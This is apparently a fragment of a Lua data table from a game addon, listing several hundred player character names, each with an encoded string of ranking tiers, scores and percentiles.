["Bazingaa"] = "ET:267/81%EB:470/85%RM:666/71%",
["Mustache"] = "EB:662/85%RM:642/70%",
["Itsoz"] = "UT:199/30%EB:489/86%EM:765/80%",
["Bloodletting"] = "CT:99/17%EB:598/78%EM:908/93%",
["Veinymonster"] = "ET:716/92%EB:738/93%EM:904/94%",
["Bboyoung"] = "ET:633/83%LB:760/96%LM:938/96%",
["Half"] = "ET:420/94%EB:734/94%LM:953/97%",
["Itzme"] = "LT:447/95%EB:715/90%LM:870/98%",
["Luragar"] = "LT:774/98%LB:773/98%LM:894/96%",
["Kroniq"] = "ET:614/81%EB:665/85%EM:757/82%",
["Jaydubb"] = "LB:766/97%LM:935/97%",
["Pqrstz"] = "ST:711/99%LB:698/98%LM:922/96%",
["Dumbledor"] = "EB:738/93%EM:860/88%",
["Arugol"] = "LT:783/98%LB:786/98%LM:804/96%",
["Baracko"] = "LT:452/95%EB:659/85%EM:639/88%",
["Pleasantpete"] = "ET:299/84%EB:736/92%LM:987/98%",
["Fcfcfc"] = "ET:692/90%EB:728/91%LM:929/95%",
["Litdeeps"] = "ET:302/85%EB:560/91%EM:758/94%",
["Nobgob"] = "ET:665/87%EB:590/93%LM:932/96%",
["Wráth"] = "ET:646/85%EB:667/85%EM:736/94%",
["Yooink"] = "EB:604/77%EM:696/91%",
["Oldgan"] = "ET:717/91%LB:696/97%EM:683/91%",
["Optimum"] = "CT:95/17%LB:768/96%EM:877/90%",
["Zyklon"] = "CT:90/11%EB:629/82%EM:727/78%",
["Justtaunt"] = "LT:642/98%LB:774/97%EM:878/92%",
["Seiryu"] = "LT:612/98%LB:747/96%EM:897/93%",
["Jeffcurry"] = "ET:639/84%EB:723/91%EM:886/94%",
["Niklaus"] = "UT:94/38%EB:576/76%RM:526/56%",
["Glc"] = "ST:761/99%LB:787/98%LM:932/96%",
["Flashergirl"] = "RT:210/62%EB:553/79%EM:722/79%",
["Squirtlebugo"] = "UT:325/40%RB:386/67%EM:683/79%",
["Rouyituan"] = "RT:531/68%UB:346/48%RM:569/67%",
["Pipes"] = "RT:154/53%LB:759/97%LM:916/95%",
["Shawtythicc"] = "CT:106/11%UB:241/31%RM:605/67%",
["Etalon"] = "ET:758/91%LB:737/96%EM:832/90%",
["Budechige"] = "UT:90/28%RB:508/70%EM:690/76%",
["Micio"] = "CT:42/9%EB:680/90%EM:711/78%",
["Dotsnhots"] = "RB:386/55%EM:499/83%",
["Saî"] = "CT:57/15%RB:274/65%EM:319/75%",
["Laolegend"] = "UT:278/33%RB:401/56%EM:749/84%",
["Guerni"] = "CT:183/21%RB:460/66%RM:544/64%",
["Zootube"] = "ET:418/91%EB:543/93%SM:917/99%",
["Priestypooh"] = "RT:187/57%UB:341/45%EM:862/92%",
["Chainhealz"] = "LT:548/96%LB:764/97%LM:919/95%",
["Raff"] = "LT:508/95%EB:540/75%EM:770/84%",
["Boriius"] = "CT:68/6%UB:348/48%CM:47/13%",
["Hoosey"] = "UT:298/36%EB:560/78%EM:481/82%",
["Ahuizotl"] = "CT:33/7%UB:342/47%EM:711/80%",
["Thirdfaction"] = "UT:352/43%EB:597/82%EM:733/80%",
["Bingxue"] = "UT:313/38%UB:257/33%RM:477/52%",
["Shrimpngrits"] = "CT:44/3%RB:510/73%EM:725/80%",
["Akindale"] = "LT:581/97%EB:654/89%LM:953/97%",
["Benshaman"] = "UT:133/42%RB:364/51%RM:516/57%",
["Nouvelle"] = "RT:553/71%RB:509/72%RM:493/57%",
["Globs"] = "UT:278/34%RB:479/69%UM:183/46%",
["Hotus"] = "CT:42/3%RB:439/62%CM:206/23%",
["Rl"] = "EB:549/76%RM:542/60%",
["Spamhealftw"] = "RB:400/57%EM:702/77%",
["Dagajr"] = "RB:536/74%EM:750/82%",
["Zakumedic"] = "UB:236/30%UM:269/31%",
["Arsinick"] = "EB:593/81%SM:988/99%",
["Silentlilly"] = "RB:218/51%UM:359/38%",
["Roamingstorm"] = "UT:333/44%EB:566/80%UM:397/48%",
["Xyna"] = "UB:304/40%RM:542/62%",
["Linzhengyin"] = "RB:292/67%CM:179/20%",
["Trollish"] = "EB:718/94%EM:820/87%",
["Wolwol"] = "CT:29/1%RB:278/64%CM:212/24%",
["Brønsøn"] = "ET:339/85%EB:581/80%EM:826/88%",
["Lazydrink"] = "ET:500/86%EB:673/91%EM:869/92%",
["Hailongg"] = "ET:420/91%RB:498/71%UM:243/29%",
["Partygurl"] = "RT:166/54%RB:453/64%RM:610/67%",
["Twigii"] = "UB:335/45%RM:211/54%",
["Bigpopz"] = "RB:525/72%EM:774/84%",
["Jebuschrisp"] = "RB:369/52%RM:392/74%",
["Hothealzforu"] = "CT:185/21%UB:288/38%EM:506/83%",
["Jimlaffs"] = "UB:301/40%RM:613/67%",
["Kedge"] = "RB:380/53%RM:461/50%",
["Shamjamu"] = "CT:61/5%RB:465/64%EM:767/83%",
["Ameghandrah"] = "RB:396/72%EM:615/78%",
["Mitchiam"] = "RT:521/66%RB:515/74%RM:461/69%",
["Enigmas"] = "EB:572/79%EM:881/92%",
["Rottnhot"] = "ET:402/90%RB:477/66%EM:802/87%",
["Zath"] = "LT:762/96%SB:808/99%SM:1014/99%",
["Leonarvin"] = "ET:732/94%EB:569/80%EM:723/82%",
["Seprica"] = "ET:387/93%EB:666/84%EM:847/88%",
["Señorlotus"] = "ET:682/88%EB:602/77%EM:853/87%",
["Missgupzilla"] = "ET:704/91%EB:740/94%LM:698/95%",
["Phrixius"] = "ET:654/85%EB:612/78%EM:752/81%",
["Sizzleñips"] = "LT:745/95%EB:695/93%EM:720/83%",
["Orangebike"] = "LT:745/95%LB:766/96%LM:962/97%",
["Callamedic"] = "LT:752/98%LB:750/97%LM:890/95%",
["Scatmanjohn"] = "LT:628/98%LB:681/98%LM:924/95%",
["Dikymo"] = "ET:728/93%LB:789/98%LM:963/97%",
["Livedark"] = "ET:707/91%LB:760/95%LM:945/96%",
["Chrits"] = "ET:598/79%EB:702/90%EM:837/88%",
["Harrydotterr"] = "ET:648/85%EB:743/94%EM:819/87%",
["Falstaff"] = "LT:759/96%LB:761/95%EM:920/93%",
["Fatalia"] = "ST:729/99%LB:639/97%EM:817/87%",
["Hachi"] = "ET:581/77%EB:567/75%EM:526/86%",
["Jobby"] = "ET:678/88%LB:679/98%LM:925/95%",
["Byerly"] = "LT:752/95%LB:732/98%EM:415/76%",
["Ryxain"] = "ET:396/93%EB:686/88%EM:581/91%",
["Snackers"] = "LT:573/97%LB:772/98%LM:851/98%",
["Ayumia"] = "LT:761/98%LB:777/98%LM:916/96%",
["Artii"] = "ET:725/93%LB:768/96%EM:903/92%",
["Kamí"] = "LT:764/96%LB:765/96%EM:885/90%",
["Imaginaut"] = "RT:549/74%EB:521/88%EM:773/81%",
["Acai"] = "LT:790/98%SB:811/99%SM:996/99%",
["Everqt"] = "LT:777/98%EB:695/93%LM:928/98%",
["Yeezus"] = "ET:723/93%LB:788/98%SM:1050/99%",
["Drgreeny"] = "ET:735/94%EB:706/90%EM:828/86%",
["Stuntmon"] = "ET:695/90%LB:696/97%EM:662/91%",
["Jths"] = "ET:679/88%LB:761/96%LM:950/96%",
["Zio"] = "ET:398/92%EB:736/93%EM:923/94%",
["Ritu"] = "LT:489/96%SB:800/99%LM:950/96%",
["Lygre"] = "ET:261/80%EB:660/86%EM:923/93%",
["Aâron"] = "ET:607/80%RB:359/51%EM:719/78%",
["Bloodfang"] = "ET:344/89%EB:672/85%EM:873/89%",
["Fizel"] = "LT:567/97%EB:742/94%LM:961/97%",
["Jfish"] = "ST:688/99%EB:554/93%EM:463/82%",
["Evilded"] = "LT:763/97%LB:773/97%LM:931/95%",
["Midragga"] = "ET:368/91%LB:787/98%LM:940/97%",
["Olyakza"] = "ET:598/79%LB:587/96%EM:849/92%",
["Jimboom"] = "ST:823/99%SB:848/99%SM:983/99%",
["Ragnarokette"] = "LT:598/98%LB:759/96%LM:788/97%",
["Ic"] = "ST:804/99%SB:804/99%LM:973/98%",
["Unu"] = "ET:712/92%LB:641/97%EM:857/90%",
["Alexlulw"] = "ET:722/92%EB:727/92%EM:878/91%",
["Kunzeriffic"] = "ET:662/85%LB:640/95%RM:483/54%",
["Jamu"] = "ET:704/91%RB:423/59%UM:376/44%",
["Nellezhar"] = "LT:770/97%LB:767/96%LM:978/98%",
["Corrupdian"] = "LT:744/95%EB:714/91%EM:560/86%",
["Nelsonious"] = "ET:689/89%EB:651/84%EM:714/76%",
["Viscount"] = "ET:686/89%SB:800/99%LM:990/98%",
["Numelin"] = "ET:284/82%EB:603/77%EM:713/75%",
["Drang"] = "ET:713/92%RB:220/52%EM:705/75%",
["Quigbert"] = "ET:404/94%EB:593/77%EM:497/76%",
["Annaya"] = "LT:772/97%SB:819/99%SM:1007/99%",
["Shambles"] = "LT:464/95%EB:684/87%EM:739/93%",
["Smilyfun"] = "LT:755/96%SB:797/99%EM:794/89%",
["Drunkinfears"] = "ET:733/94%LB:773/97%EM:869/91%",
["Odinzen"] = "ST:751/99%SB:797/99%LM:873/96%",
["Callelle"] = "ET:674/93%EB:682/92%EM:707/94%",
["Faraie"] = "ST:794/99%SB:797/99%LM:949/98%",
["Atheistftw"] = "ET:633/83%EB:718/91%EM:724/93%",
["Pixis"] = "LT:753/96%EB:746/94%EM:904/94%",
["Bigfella"] = "ET:644/89%LB:775/98%LM:961/98%",
["Icanseeghost"] = "ET:723/93%LB:786/98%LM:961/97%",
["Deadarrival"] = "RT:480/65%EB:486/86%EM:787/82%",
["Hëathcliff"] = "ET:627/94%EB:530/94%EM:517/82%",
["Holomoon"] = "ST:826/99%SB:776/99%LM:937/98%",
["Hazedlol"] = "ET:574/76%LB:795/98%LM:951/96%",
["Katreya"] = "ET:705/93%EB:719/93%EM:834/92%",
["Puretest"] = "ST:796/99%SB:720/99%EM:900/94%",
["Couturee"] = "ET:720/94%LB:652/97%EM:830/92%",
["Ginkginw"] = "ET:695/90%LB:694/97%EM:770/80%",
["Airwolff"] = "ET:386/80%EB:672/90%RM:539/74%",
["Arithonhanzo"] = "ET:719/92%LB:799/98%LM:970/98%",
["Draktyr"] = "ST:707/99%LB:767/97%EM:877/93%",
["Hopeyoudie"] = "ET:441/93%LB:758/96%LM:919/95%",
["Torr"] = "LT:740/95%LB:778/98%LM:925/96%",
["Shcout"] = "ET:636/83%EB:725/92%EM:920/94%",
["Thrallvoter"] = "LT:443/95%LB:720/98%EM:908/93%",
["Whityeboi"] = "ET:698/89%EB:740/93%EM:909/92%",
["Bôwjob"] = "LT:790/98%LB:787/98%LM:964/98%",
["Cede"] = "ET:707/91%LB:759/96%RM:516/56%",
["Îll"] = "LT:751/95%EB:592/93%EM:879/90%",
["Bigtasty"] = "RT:223/74%EB:674/86%EM:846/88%",
["Loras"] = "RT:203/70%EB:736/92%EM:852/88%",
["Lexilock"] = "LT:749/96%LB:767/97%LM:927/95%",
["Offwarlock"] = "CT:40/12%LB:754/95%LM:953/97%",
["Nitrana"] = "ET:273/82%EB:587/77%RM:356/66%",
["Imajerk"] = "EB:682/87%EM:789/82%",
["Genzler"] = "ST:725/99%EB:596/93%EM:859/89%",
["Binkus"] = "ET:618/82%LB:790/98%LM:982/98%",
["Alathrya"] = "RT:397/52%EB:670/86%RM:614/67%",
["Bigpapaa"] = "RT:514/68%EB:673/86%EM:775/82%",
["Pansy"] = "LT:756/97%LB:773/98%LM:962/98%",
["Dienasty"] = "LT:554/98%LB:668/98%LM:951/98%",
["Mellemkød"] = "LT:746/95%SB:822/99%LM:972/98%",
["Warcryme"] = "RT:234/73%EB:663/85%UM:416/47%",
["Bittychunk"] = "LT:763/97%LB:755/95%EM:897/92%",
["Dardoc"] = "ET:653/86%LB:785/98%EM:910/91%",
["Ambiguous"] = "ET:322/87%EB:659/85%RM:502/56%",
["Blazzinbob"] = "ET:679/88%LB:630/95%EM:927/94%",
["Wetnoodle"] = "ET:357/90%EB:453/83%EM:726/77%",
["Buggyvue"] = "ET:631/83%LB:642/95%EM:756/94%",
["Backyardio"] = "RT:392/52%EB:661/85%EM:749/79%",
["Wafflefries"] = "ET:464/94%LB:769/97%LM:971/98%",
["Ancity"] = "RT:525/71%EB:678/86%RM:652/70%",
["Sugarhero"] = "LT:562/97%EB:726/92%EM:918/94%",
["Zayin"] = "UT:70/28%EB:626/81%RM:524/60%",
["Erosennin"] = "LB:648/96%EM:870/90%",
["Kekstorm"] = "ET:351/91%EB:670/86%EM:743/80%",
["Bosslevel"] = "ET:244/76%EB:668/84%EM:930/94%",
["Cárneasada"] = "EB:747/94%EM:897/92%",
["Sigue"] = "ET:369/91%EB:591/93%LM:938/96%",
["Slowmanl"] = "UT:229/44%EB:567/75%RM:216/51%",
["Warriorster"] = "ET:639/84%EB:706/89%EM:864/94%",
["Longstreet"] = "UT:223/29%EB:671/86%EM:878/91%",
["Shadowmecc"] = "RB:553/73%RM:493/55%",
["Miomioo"] = "ET:616/80%EB:667/86%EM:758/80%",
["Lïlïth"] = "RT:480/64%EB:733/92%EM:916/93%",
["Fostwo"] = "LT:781/98%SB:828/99%LM:952/98%",
["Jphlip"] = "ET:648/86%LB:755/97%LM:928/95%",
["Recktus"] = "ST:787/99%SB:771/99%SM:960/99%",
["Glutch"] = "RT:194/71%EB:499/77%EM:771/88%",
["Twight"] = "ET:377/91%EB:732/92%LM:831/96%",
["Dripski"] = "RT:527/69%EB:619/81%EM:770/81%",
["Wølf"] = "ET:347/89%EB:531/89%EM:882/90%",
["Litreocola"] = "ET:313/87%EB:642/81%RM:592/63%",
["Bahamut"] = "RT:144/53%SB:795/99%SM:1007/99%",
["Duxingxia"] = "ET:629/82%EB:456/83%RM:490/52%",
["Necrøsis"] = "ET:694/90%LB:754/95%SM:935/99%",
["Pyro"] = "ET:574/77%LB:707/97%EM:666/86%",
["Nomoreguns"] = "RT:368/52%LB:774/97%LM:953/97%",
["Huntudown"] = "ET:383/92%LB:667/96%LM:801/95%",
["Spc"] = "RT:426/57%EB:709/89%EM:914/93%",
["Daenerys"] = "ET:708/91%EB:702/88%EM:850/88%",
["Dakanaka"] = "UT:322/45%EB:610/79%EM:793/83%",
["Rosewater"] = "UT:381/47%RB:415/58%UM:212/26%",
["Brainwashing"] = "RB:495/71%EM:734/84%",
["Fadec"] = "UB:286/38%",
["Straycatt"] = "RT:507/65%RB:468/67%RM:619/68%",
["Sharmin"] = "CT:68/6%EB:470/89%EM:458/80%",
["Myris"] = "EB:438/86%RM:541/64%",
["Friedtendies"] = "CT:83/7%UB:321/44%EM:432/79%",
["Maiva"] = "UT:103/33%LB:745/96%SM:979/99%",
["Ummsgonewild"] = "RB:532/74%RM:677/74%",
["Seary"] = "EB:562/78%EM:707/77%",
["Trimas"] = "CT:61/16%RB:446/64%EM:754/86%",
["Surisuri"] = "CT:2/0%RB:273/65%RM:640/73%",
["Lunadene"] = "RB:396/57%EM:659/76%",
["Flexibull"] = "CT:30/2%EB:675/91%LM:923/95%",
["Totembot"] = "UT:261/31%EB:674/90%EM:700/94%",
["Aphron"] = "UB:178/43%RM:502/55%",
["Hayami"] = "CT:110/11%RB:363/51%RM:337/69%",
["Deoh"] = "UB:343/48%UM:436/47%",
["Gubo"] = "CT:85/8%EB:631/87%EM:552/87%",
["Santasgift"] = "EB:527/76%RM:612/68%",
["Holytrap"] = "UT:87/27%EB:391/80%RM:563/66%",
["Nymfy"] = "UT:366/46%RB:410/58%RM:476/54%",
["Impedimentia"] = "EB:570/78%EM:679/75%",
["Ryohei"] = "RT:198/59%EB:426/84%EM:657/92%",
["Crimsonbeard"] = "EB:626/86%RM:661/72%",
["Bandages"] = "CT:74/7%UB:281/37%UM:402/48%",
["Shyrah"] = "UT:85/26%EB:417/83%RM:545/60%",
["Flarewind"] = "UT:103/37%EB:564/80%UM:340/36%",
["Ibo"] = "UT:76/25%EB:618/86%EM:867/93%",
["Holynite"] = "ET:344/86%EB:429/84%RM:477/52%",
["Remembrancer"] = "EB:413/82%EM:450/80%",
["Hippou"] = "CT:32/1%RB:449/64%RM:419/66%",
["Mohawk"] = "RB:379/54%CM:117/13%",
["Jaf"] = "RT:509/64%EB:591/81%EM:735/80%",
["Jerryatrick"] = "RT:412/52%EB:584/82%UM:408/47%",
["Happerella"] = "RB:215/54%EM:704/77%",
["Avivasofia"] = "RB:378/53%UM:316/36%",
["Bambooz"] = "RT:204/60%EB:659/88%EM:883/92%",
["Takemefly"] = "CT:89/9%RB:248/60%RM:618/71%",
["Milkka"] = "EB:624/85%EM:790/85%",
["Locké"] = "RT:397/52%EB:667/90%EM:814/87%",
["Sädläd"] = "CT:14/0%RB:292/66%EM:563/75%",
["Blooty"] = "RT:433/57%EB:466/80%RM:564/66%",
["Deliquium"] = "LB:755/97%LM:945/97%",
["Neverhasmana"] = "UT:210/28%EB:646/89%LM:894/95%",
["Nvde"] = "UT:351/46%LB:565/95%EM:678/75%",
["Thebrideof"] = "CT:63/5%EB:389/80%RM:395/74%",
["Neldy"] = "RB:480/69%EM:866/93%",
["Rodgey"] = "ET:592/75%EB:558/94%",
["Monkka"] = "ET:663/83%EB:601/84%RM:620/72%",
["Decisivé"] = "RB:375/53%UM:260/31%",
["Ithuman"] = "ET:426/92%EB:635/87%EM:769/83%",
["Solasis"] = "CT:16/23%RB:397/57%CM:127/14%",
["Ççäv"] = "EB:407/82%RM:559/62%",
["Drowid"] = "RB:506/70%RM:647/72%",
["Iywf"] = "EB:648/87%EM:767/85%",
["Missyu"] = "ET:709/91%EB:734/93%EM:789/75%",
["Chillpill"] = "ET:704/91%LB:767/98%LM:922/95%",
["Janesice"] = "LT:632/98%LB:638/97%LM:748/96%",
["Jesbudz"] = "LT:790/98%SB:794/99%LM:985/98%",
["Linlynn"] = "LT:767/97%LB:702/97%EM:835/87%",
["Ragewar"] = "LT:747/95%EB:601/78%UM:454/47%",
["Seaturtles"] = "ET:715/92%LB:628/95%EM:408/75%",
["Drus"] = "LT:747/95%LB:775/97%LM:972/98%",
["Hansu"] = "LT:777/98%LB:770/97%LM:947/96%",
["Zzan"] = "LT:765/96%SB:754/99%EM:914/94%",
["Evilspartan"] = "ET:729/93%LB:799/98%EM:911/92%",
["Death"] = "LT:751/95%LB:767/96%LM:961/98%",
["Evilema"] = "LT:610/98%LB:748/95%EM:903/93%",
["Ekohz"] = "ET:728/93%EB:631/83%EM:773/83%",
["Maltis"] = "ET:259/79%LB:750/95%EM:869/91%",
["Phales"] = "ST:719/99%SB:754/99%LM:815/97%",
["Bloodpool"] = "LT:769/97%LB:782/98%LM:962/97%",
["Ganjsmoke"] = "ET:665/87%EB:698/92%EM:814/90%",
["Bimmyburner"] = "LT:758/96%EB:742/94%EM:879/90%",
["Fjordx"] = "ET:691/90%RB:471/68%UM:407/44%",
["Frozenballz"] = "ET:288/84%LB:757/95%LM:934/95%",
["Urbadplaybfa"] = "ET:728/93%LB:758/95%LM:944/95%",
["Inzua"] = "ET:291/84%EB:728/93%EM:921/94%",
["Shapeepee"] = "ST:793/99%LB:756/95%LM:967/98%",
["Snowfan"] = "ST:731/99%EB:568/94%EM:865/90%",
["Ruki"] = "LT:758/96%LB:752/95%EM:820/86%",
["Shanto"] = "ET:742/94%LB:792/98%LM:974/98%",
["Tukoloch"] = "LT:582/97%EB:706/94%LM:912/97%",
["Ggrindy"] = "ST:788/99%LB:740/98%EM:893/91%",
["Stormcast"] = "ET:718/92%EB:732/92%LM:924/95%",
["Darkmaster"] = "ET:724/93%LB:762/96%LM:772/96%",
["Elphy"] = "RT:494/66%EB:711/91%EM:774/83%",
["Xoory"] = "LT:775/97%LB:758/95%LM:931/96%",
["Chxrles"] = "ET:743/94%EB:663/86%EM:810/85%",
["Friedpython"] = "ET:587/77%LB:711/98%EM:860/88%",
["Pyrodave"] = "ST:799/99%LB:797/98%LM:976/98%",
["Deepgray"] = "ET:635/84%EB:508/92%EM:894/93%",
["Salocin"] = "ST:697/99%LB:626/95%EM:849/87%",
["Daolonwong"] = "ET:737/94%EB:676/91%LM:902/96%",
["Loowipe"] = "ET:672/87%EB:636/83%EM:885/89%",
["Breakfasts"] = "RT:509/67%EB:607/94%",
["Gandizzle"] = "ET:305/85%EB:591/83%EM:496/87%",
["Qiutuomatie"] = "LT:555/97%EB:743/94%EM:710/76%",
["Amefu"] = "ET:605/79%LB:686/97%EM:612/87%",
["Exalted"] = "ET:337/89%EB:479/88%EM:539/87%",
["Mägnum"] = "ET:746/94%LB:774/97%EM:867/90%",
["Coldkiller"] = "RT:526/69%RB:501/67%UM:201/48%",
["Littlegeorge"] = "ET:700/90%LB:731/98%LM:788/95%",
["Roseze"] = "ET:350/90%LB:778/98%EM:854/93%",
["Chiron"] = "ST:807/99%LB:735/98%SM:1000/99%",
["Aphrone"] = "ET:627/83%LB:750/95%EM:905/93%",
["Thedeathscat"] = "ET:284/83%EB:716/92%EM:869/91%",
["Phirex"] = "ET:658/86%EB:733/93%LM:939/96%",
["Abraxus"] = "ET:399/93%SB:787/99%SM:921/99%",
["Huntermain"] = "LT:759/96%LB:791/98%LM:984/98%",
["Donqxot"] = "RT:416/54%RB:500/67%UM:329/38%",
["Pravity"] = "ET:714/92%LB:666/96%LM:887/98%",
["Despairdie"] = "ET:740/94%LB:771/97%SM:1032/99%",
["Ramonx"] = "ET:651/86%EB:720/92%EM:685/79%",
["Sablethorn"] = "ET:307/75%EB:540/82%EM:820/94%",
["Akaran"] = "LT:763/97%LB:785/98%LM:975/98%",
["Chiro"] = "LT:680/95%SB:813/99%SM:997/99%",
["Moltrez"] = "LT:762/96%LB:788/98%LM:939/96%",
["Sparcky"] = "ET:448/94%LB:757/95%EM:911/93%",
["Deapstate"] = "ET:715/92%LB:685/97%LM:950/96%",
["Gbasam"] = "CT:109/14%RB:397/54%CM:73/9%",
["Krossa"] = "LT:746/97%LB:776/98%LM:973/98%",
["Âssassinator"] = "ET:739/94%SB:755/99%SM:987/99%",
["Kremit"] = "ET:718/93%LB:781/97%LM:978/98%",
["Zemix"] = "LT:755/96%LB:633/97%LM:912/95%",
["Malayaboo"] = "ET:260/80%EB:609/94%EM:825/86%",
["Hotguise"] = "LT:714/95%LB:720/96%LM:912/96%",
["Mordox"] = "ET:688/89%EB:742/93%EM:905/93%",
["Potara"] = "LT:585/97%LB:758/95%EM:822/85%",
["Bushybottom"] = "LT:729/96%LB:756/98%LM:874/96%",
["Ervs"] = "ET:333/89%LB:646/95%EM:727/93%",
["Peartree"] = "LT:749/97%SB:680/99%LM:854/95%",
["Rawlock"] = "ET:619/81%EB:728/92%EM:809/84%",
["Biggin"] = "LT:461/96%LB:751/96%LM:646/95%",
["Tiv"] = "LT:725/95%EB:684/94%EM:556/80%",
["Rudetude"] = "EB:706/90%EM:785/83%",
["Toxicaf"] = "RT:227/73%EB:615/80%RM:592/65%",
["Zibazoo"] = "UT:254/33%EB:746/94%SM:1008/99%",
["Ethrick"] = "ET:336/89%LB:747/95%LM:867/95%",
["Pacoh"] = "LB:788/98%LM:938/96%",
["Hosaz"] = "EB:675/85%EM:833/86%",
["Jimlaff"] = "ET:578/77%EB:706/89%EM:780/81%",
["Fugly"] = "LT:789/98%LB:772/97%LM:980/98%",
["Nazzul"] = "SB:765/99%SM:988/99%",
["Angryjimmy"] = "EB:739/93%EM:879/90%",
["Snozberry"] = "LT:762/96%LB:782/98%SM:938/99%",
["Boddah"] = "RT:466/64%EB:502/87%",
["Ivlatt"] = "ST:706/99%LB:714/98%LM:842/97%",
["Braxtonmage"] = "LT:761/96%LB:754/96%EM:915/94%",
["Sojutown"] = "ET:276/83%EB:729/91%EM:927/94%",
["Kaizi"] = "LT:474/95%EB:681/87%RM:263/57%",
["Kellibelli"] = "LT:642/98%LB:694/97%EM:852/87%",
["Yeahh"] = "RT:137/51%EB:571/76%RM:596/68%",
["Arech"] = "ET:353/91%EB:711/89%EM:903/92%",
["Grimby"] = "EB:738/93%EM:834/87%",
["Wackyweed"] = "LT:562/97%EB:429/80%EM:860/88%",
["Khrushchev"] = "RT:179/61%EB:600/79%EM:509/81%",
["Skizzle"] = "ET:718/92%LB:771/97%LM:953/97%",
["Jellow"] = "ET:672/91%LB:784/98%EM:887/94%",
["Regards"] = "ET:430/94%EB:667/86%EM:624/88%",
["Izumo"] = "ET:596/79%EB:478/85%EM:783/82%",
["Navene"] = "ET:725/93%LB:766/96%LM:910/95%",
["Takyr"] = "LT:573/97%EB:577/76%EM:774/81%",
["Kasukar"] = "LT:559/97%EB:702/89%EM:885/94%",
["Monocle"] = "LT:753/96%LB:761/97%LM:933/96%",
["Huckus"] = "ET:707/91%SB:762/99%LM:818/96%",
["Airnhof"] = "RT:136/51%EB:651/82%EM:789/83%",
["Deathzod"] = "ET:314/86%EB:444/82%EM:852/87%",
["Parsuer"] = "LB:791/98%SM:1008/99%",
["Strombolie"] = "ET:698/90%LB:781/98%LM:972/98%",
["Kazusatoma"] = "ET:370/92%EB:618/94%EM:750/79%",
["Krunnp"] = "ET:572/76%LB:778/97%LM:976/98%",
["Rênd"] = "ET:660/86%EB:684/87%RM:430/71%",
["Stirner"] = "ST:780/99%LB:727/98%SM:918/99%",
["Ragner"] = "ET:238/76%EB:546/90%EM:749/79%",
["Serus"] = "LT:654/98%LB:655/96%EM:851/89%",
["Stücknästy"] = "CT:43/9%EB:510/88%EM:843/87%",
["Gilanerth"] = "LB:773/97%LM:967/97%",
["Oldsixnvrdie"] = "ET:650/84%EB:463/84%EM:832/87%",
["Lilmish"] = "ET:598/79%EB:700/89%RM:694/74%",
["Jetlla"] = "UT:205/26%EB:590/78%RM:617/67%",
["Cyberlincøln"] = "ET:609/81%EB:694/87%EM:877/87%",
["Leapattack"] = "CT:41/9%EB:631/81%EM:815/85%",
["Aggrodamus"] = "ET:610/81%EB:742/93%EM:790/83%",
["Kuyashii"] = "EB:750/94%EM:867/89%",
["Juggernautie"] = "EB:703/94%EM:781/89%",
["Snakekiller"] = "CT:170/22%EB:581/77%UM:350/40%",
["Muzzgash"] = "LT:546/97%EB:647/82%EM:756/79%",
["Cuckeecheese"] = "ET:588/78%EB:644/83%EM:529/92%",
["Numero"] = "UB:234/30%RM:452/53%",
["Jebudia"] = "ET:434/92%EB:699/94%EM:872/93%",
["Netr"] = "CT:182/21%UB:305/42%RM:326/68%",
["Michelly"] = "ET:405/90%EB:600/84%LM:758/96%",
["Vinnydeltaco"] = "RT:551/70%EB:641/89%RM:572/67%",
["Trijik"] = "UT:201/27%RB:388/55%EM:438/81%",
["Raffs"] = "UB:256/33%",
["Chanelecoast"] = "ET:299/78%EB:530/92%EM:522/85%",
["Whitebronco"] = "EB:583/80%EM:704/77%",
["Dreamr"] = "RB:471/67%RM:655/74%",
["Divínity"] = "CT:83/8%RB:378/51%EM:763/81%",
["Ooremiliaoo"] = "RT:160/52%EB:658/89%EM:743/81%",
["Healnu"] = "EB:696/93%LM:940/97%",
["Stardasher"] = "RB:490/70%EM:676/77%",
["Exnovo"] = "EB:542/78%EM:834/90%",
["Lovesmehot"] = "RT:499/63%EB:541/77%EM:650/75%",
["Cerisa"] = "RB:410/57%",
["Pabbie"] = "UT:233/28%EB:393/80%EM:886/94%",
["Stub"] = "ET:376/88%RB:528/73%EM:510/84%",
["Noflo"] = "RB:509/70%RM:590/66%",
["Iholy"] = "UT:353/43%EB:573/81%UM:252/29%",
["Mosenpope"] = "ET:616/78%RB:295/67%EM:693/76%",
["Phoever"] = "RB:336/73%RM:531/58%",
["Zyori"] = "LB:709/95%EM:866/92%",
["Ganma"] = "RB:421/57%RM:490/53%",
["Slowdog"] = "RT:484/62%EB:577/81%EM:808/87%",
["Justbear"] = "EB:539/77%EM:786/85%",
["Thothots"] = "RB:432/62%UM:359/43%",
["Cloudchsr"] = "ET:730/89%EB:682/92%EM:834/91%",
["Lengua"] = "RT:211/63%EB:549/76%EM:708/94%",
["Chiptron"] = "RT:216/66%RB:521/74%EM:726/81%",
["Saidogwhite"] = "UT:101/37%RB:471/68%RM:531/63%",
["Maolol"] = "RT:232/67%EB:528/80%EM:805/90%",
["Amahlfarouk"] = "UT:213/25%RB:522/72%EM:733/80%",
["Principled"] = "UT:250/30%EB:426/84%RM:562/62%",
["Wafflesundae"] = "UB:333/44%RM:437/52%",
["Imjustjoshin"] = "ET:537/79%EB:326/82%EM:899/93%",
["Josefina"] = "RB:537/74%EM:743/81%",
["Glutezeus"] = "CT:77/7%RB:446/64%RM:307/66%",
["Nolmans"] = "RT:589/73%RB:518/74%RM:493/58%",
["Ueharahimari"] = "CT:72/21%RB:504/70%RM:556/62%",
["Psilocybin"] = "RB:495/68%EM:837/89%",
["Barlen"] = "CT:142/15%RB:538/74%RM:606/66%",
["Alexroc"] = "EB:609/84%EM:882/92%",
["Zelia"] = "UT:114/41%RB:481/69%EM:675/77%",
["Haleigh"] = "RB:425/61%RM:578/67%",
["Eusticia"] = "UB:192/46%RM:601/66%",
["Bullroar"] = "LT:534/96%EB:528/92%EM:832/89%",
["Divinity"] = "UB:184/45%CM:71/7%",
["Vicromano"] = "UT:243/28%RB:338/72%EM:726/77%",
["Quamico"] = "LB:724/96%RM:660/73%",
["Nyad"] = "RB:272/60%UM:269/32%",
["Vashtielle"] = "EB:611/84%EM:807/87%",
["Bakashacone"] = "RT:530/69%EB:514/91%LM:926/96%",
["Taoh"] = "EB:636/88%UM:411/48%",
["Casha"] = "RB:408/58%RM:654/72%",
["Cerraeux"] = "RB:220/54%UM:396/48%",
["Cêles"] = "ET:739/89%LB:732/96%EM:788/85%",
["Mournful"] = "CT:136/15%RB:436/62%RM:431/51%",
["Shastaroth"] = "RT:419/53%EB:615/85%RM:643/74%",
["Snowsi"] = "LT:758/96%LB:725/98%EM:911/93%",
["Kaylai"] = "ET:731/93%EB:721/91%EM:863/89%",
